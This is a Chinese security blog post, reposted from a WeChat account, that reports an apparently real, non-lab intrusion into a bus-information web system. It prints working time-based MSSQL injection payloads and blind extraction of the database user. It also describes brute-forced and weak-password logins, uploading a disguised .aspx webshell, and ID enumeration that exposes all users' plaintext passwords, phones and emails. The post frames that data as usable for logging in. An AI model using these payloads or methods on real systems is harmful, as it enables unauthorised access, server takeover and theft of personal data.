从刚开始学习网安就一直在学习sql注入,今天终于在靶场以外的系统挖到sql注入漏洞了,可喜可贺可喜可贺。
前台通过爆破的账号密码,进去
按顺序依次点击1、2、3,然后开启抓包点击4
构造以下注入poc,可见注入延时了五秒,用户输入的语句成功拼接到原有的SQL语句上执行了
下面的poc是MenuIds的值
100%2C101%2C151%2C152%2C153%2C154%2C200%2C201%2C202%2C203%2C204%2C300%2C301%2C302%2C303%2C305%2C306%2C307%2C308%2C311%2C312%2C313%2C314%2C400%2C401%2C800%2C801%2C802%2C805%2C806%2C850%2C851%2C852%2C853%2C861%2C862%2C863%2C870%2C880%2C900%2C9070%2C9071%2C9080%2C9081%2C9082%2C9083%2C9084%2C9085%2C9086%2C9093'%3BWAITFOR%20DELAY%20'0%3A0%3A5'%20--
下面开始进行注入拿数据,构造下面poc,对数据库当前用户名进行查询
100%2C101%2C151%2C152%2C153%2C154%2C200%2C201%2C202%2C203%2C204%2C300%2C301%2C302%2C303%2C305%2C306%2C307%2C308%2C311%2C312%2C313%2C314%2C400%2C401%2C800%2C801%2C802%2C805%2C806%2C850%2C851%2C852%2C853%2C861%2C862%2C863%2C870%2C880%2C900%2C9070%2C9071%2C9080%2C9081%2C9082%2C9083%2C9084%2C9085%2C9086%2C9093'%3Bif(ascii(substring((select%20user)%2C1%2C1)))%3D116%20WAITFOR%20DELAY%20'0%3A0%3A5'%20--
成功延时5秒,说明数据库当前用户名第一个字母为t,下面继续对数据库用户名第N位字母进行猜解
然后拿到当前数据库名称,至此,sql注入漏洞验证完成
SQLMap进行自动化判断注入
请输入正文http://xxxxxxxx/Home/Index#
弱口令进去,账号和密码是123456
上传文件头为图片格式的图片马,然后将上传的文件名后缀改成aspx
根据返回的内容打开对应url,然后即可看到webshell上传成功
遍历id参数从1-40,即可查到当前系统的所有公交信息
可以看见明文看见其他用户的账户密码、手机号、邮箱等敏感信息,我们可以利用这个信息进行登录等操作
再次将数据包转发到burp的Intruder模块,进行1-100遍历id值,可见也是将全站用户信息都可以遍历出来了
![实战分享]( "实战分享")
原文始发于微信公众号(迪哥讲事):实战分享
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
点赞
https://cn-sec.com/archives/2668038.html
复制链接
复制链接
-
左青龙
- 微信扫一扫
-
-
右白虎
- 微信扫一扫
-
评论